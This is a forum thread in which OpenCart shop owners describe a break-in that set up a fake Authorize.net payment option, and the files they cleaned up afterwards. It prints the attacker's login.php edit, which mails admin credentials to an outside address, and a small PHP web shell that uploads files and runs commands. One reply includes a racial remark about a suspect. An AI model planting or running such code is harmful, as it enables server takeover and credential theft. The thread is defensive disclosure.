Admin password hack + Authorize.net

Posted: Mon Jul 06, 2015 10:30 pm
by tonybarnes
OC 1.5.5.1

Just discovered some little shitbag got into our site through the /download vulnerability. I thought I'd secured that, so have now deleted that directory, turned off downloads, and reset the main account password (server level).

Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.

By pure luck, after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - a pretty simple script edit that emails through login info:

```php
protected function validate() {
    if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
        $this->error['warning'] = $this->language->get('error_login');
    }

    if (!$this->error) {
        // Attacker's addition: host, request URI, submitted username and password joined into one string ...
        $smail = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "|" . $this->request->post['username'] . "|" . $this->request->post['password'];
        // ... and mailed out on every successful admin login
        mail("thankforyourhelp2015@gmail.com", "OUR-SITE", $smail, "From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
        return true;
    } else {
        return false;
    }
}
```
So as soon as I updated things, he knew our new credentials!!! :choke: :crazy:

I'm traipsing through file edit dates now to see if anything else is compromised, but one to look out for, guys and gals!!

Re: Admin password hack + Authorize.net

Posted: Mon Jul 06, 2015 11:03 pm
by tonybarnes
Ok here's a full list of changed files that I found:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/admin/controller/extension/payment.php
/catalog/controller/product/product.php
/catalog/controller/payment/authorizenet_aim.php
/catalog/controller/payment/authorizenet_sim.php
/catalog/controller/payment/pp_pro.php
/downloads/ - various stuff in here
/image/flags/index.php

Couldn't spot what had actually changed in the payment & pp_pro ones (didn't look that hard TBH); this was the contents of /image/flags/index.php:

```php
<?php
// Dropper half: with id=mm, accepts a multipart upload and writes it to the path given in the request
if (@$_REQUEST["id"] == 'mm') {
    $files = @$_FILES["files"];
    if ($files["name"] != '') {
        $fullpath = $_REQUEST["path"] . $files["name"];
        if (move_uploaded_file($files['tmp_name'], $fullpath)) {
            echo "<h1><a href='$fullpath'>shell</a></h1>";
        }
    }
    exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
// Shell half: with id=nn, runs whatever the cmd parameter contains on the server
if (@$_REQUEST["id"] == 'nn') {
    system($_GET["cmd"]);
}
?>
```

Re: Admin password hack + Authorize.net

Posted: Tue Jul 07, 2015 4:56 am
by Dhaupin
Thanks for sharing some snippets related to this.

I don't know if it's related, but some brown dude uploaded this. He has been making rounds testing for payment gateways and/or trying to fraud to US addresses. Could be the same one who keeps trying to inject into a honeypot OC download folder and/or the same one who dropped that hack.... potentially :D

Re: Admin password hack + Authorize.net

Posted: Wed Jul 15, 2015 11:02 pm
by tonybarnes
lmao - just chilling!

Re: Admin password hack + Authorize.net

Posted: Fri Jun 03, 2016 10:59 pm
by TofuMan
Hi - I just wanted to firstly thank you tonybarnes for detailing how you fixed your hack - it happened to us in January on v1.5.6 and your post was very helpful at tidying things up again.

Now on OpenCart v2, we have had the Authorize.net hack again - seemingly identical. So I am not sure if this does use the 'download vulnerability'...

I have posted on another thread about this hack - but I think it may be helpful to post here too as it came up in Google searches. :-)

We had the same symptoms: when you go to the checkout 'Authorize.net' appears as a payment option above all others... when the customer chooses it the payment cannot be made as it does not direct to a live account... but it may allow the hacker to obtain customer data... we cannot determine exactly what he was trying to get!

For anyone reading this who has this problem... please note the following:

1. VERY IMPORTANT: The login page has been hacked!
The login page code has been edited so that if you try and change the passwords, when you login again the Hacker receives the new password directly to his email account.

2. You CANNOT enable/disable Authorize.net via OpenCart admin.
The hack uses a file that bypasses this function completely, so it has nothing to do with the payment settings you have set up. You must delete/replace hacked files via FTP to restore normal function.

3. You will have to fix this problem via FTP by locating and overwriting the changed files then changing your password (ideally through PhpMyAdmin). There is no point changing your passwords until AFTER you fix the login page hack.

We do not believe this hack requires that the hacker is able to log in... but we cannot be sure. In v1.5.6 we found all sorts of junk had been uploaded to the server... but I do not think this is the 'download vulnerability' people spoke about before, as we are in V2 and we had already removed the list of file types that could be uploaded.

Here is how we fixed it:

Firstly, we had to find all the files that had been changed by the hacker... you will see that these have a 'Last modified' date that will be very recent compared to the other files (most of which will be the same date from the time of installation).

We found on both occasions that these were the files that had been changed:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/catalog/controller/payment/authorizenet_aim.php

However, we would advise you to check through the folders for any other new or recently modified files if the following instructions do not fix your problem.

We had a copy of the website elsewhere so we could see that not only were the last modified dates 'today' but the file sizes were notably different - so the code was not the same.

We suggest you take a full backup of your site via FTP - name it clearly as a 'hacked' version not to be re-uploaded.

Once this is done, unzip a new local copy of your version of OpenCart... locate the files listed above and copy them to a folder & subfolders (we called ours 'Authorize Hack Clean Files'). You will then be able to quickly upload if it ever happens again.

Then delete the files on the server and replace with the 'clean' files - this should be enough to fix the problem.

Please note:
You cannot simply rename the authorizenet_aim.php file - even if you change the name and remove the file extension - we found it kept loading the Authorize.net option in the checkout. It must be completely removed.

Once those changes are done, you can set up a new password for your accounts. We used a secure password generator to try and make it more certain it was not a hack via password login... we don't think it is... but we do not know how this hack is done.

Lastly, we deleted all the allowed file types and MIME types in Settings > Uploads... we kept a copy of these lists in case we need to put any/all of them back again.

I hope these details help a few people out - I would really appreciate anyone listing any 'official' name for this hack, as it seems to be happening often enough and in the same way; I imagine it has been identified by others too?

Re: Admin password hack + Authorize.net

Posted: Sat Sep 29, 2018 12:28 am
by siteadvice
Anyone have any further information on what security issue hackers are exploiting to be able to get access at this level?

Re: Admin password hack + Authorize.net

Posted: Sat Sep 29, 2018 1:51 pm
by IP_CAM
Well, the main OC User Problem might be that only a small fraction of them
has much knowledge about what they're doing, in addition to so-called Dev's,
and this makes it easy for Hackers to do all kinds of things on such Sites! :laugh:
Just to give you an example of 'wide open' CHMOD 777 OC Sites: :choke:
https://www.google.com/search?q=%22index+of%22+Opencart

In addition, some Extensions might contain bad code once in a while, but
since many Users don't know a thing, they are unable to find out where to
look, and what such Code looks like, in the first place. Many Dark-Net Sites
also offer paid OC Code for free, or almost free, and OC Users are unaware
that the People behind such 'offerings' usually have some plans related to
hard cash, in one way or the other, so it's usually not clean OC-Code related
if a Site suddenly runs into such problems.

But, strictly technically/logically, one should not have a single Piece of Code
on a Server which is not actually used as well, like Authorizenet, Openbay, Amazon,
and/or other Payment/Shipping/Whatever 'Functions', but only have installed
what is required. But since some of those Extensions are 'hardcoded' into
the Source, it's not so easy to remove them all without a certain knowledge about OC.

I am just now in the process of testing a Shop Site, where I removed Authorizenet,
Ebay, Openbay, and Amazon from the Source yesterday. It worked on the spot, and if I am
lucky, then I won't find many misses, due to either removing too much or too little
in certain files containing some Code or Scripts related to those 'Functions'.
http://www.ejacob.ch/cart/

But even Facebook got hit, so there is always a chance to get hacked, especially for
those OC Users allowing others to upload images and/or other files. I just found one
of those strange images, placed in a free Theme Extension, full of Code, and I only
found out about it because I wondered about its sheer size for a simple Background
Image. So, I had to make use of my famous Image STRIPPER Program again, to get all not
'required' Code out of all of my Shop Images, and thereby make 'em a little smaller in
Size as well. :D

Ernie

Re: Admin password hack + Authorize.net

Posted: Tue Oct 09, 2018 9:43 am
by Parmodya
Can anyone check for security vulnerability on my site https://rvnb.in/tsf-police-shoes-black-colour/

It is a tsf shoes store

Re: Admin password hack + Authorize.net

Posted: Wed Oct 10, 2018 1:36 am
by IP_CAM
Well, this Code is far from even being comparable with the OC Default way of
doing things; it's all highly Custom Code, from the top down to the bottom. 8)
So, nobody would be able to assist in anything, I fear ...
Good Luck!
Ernie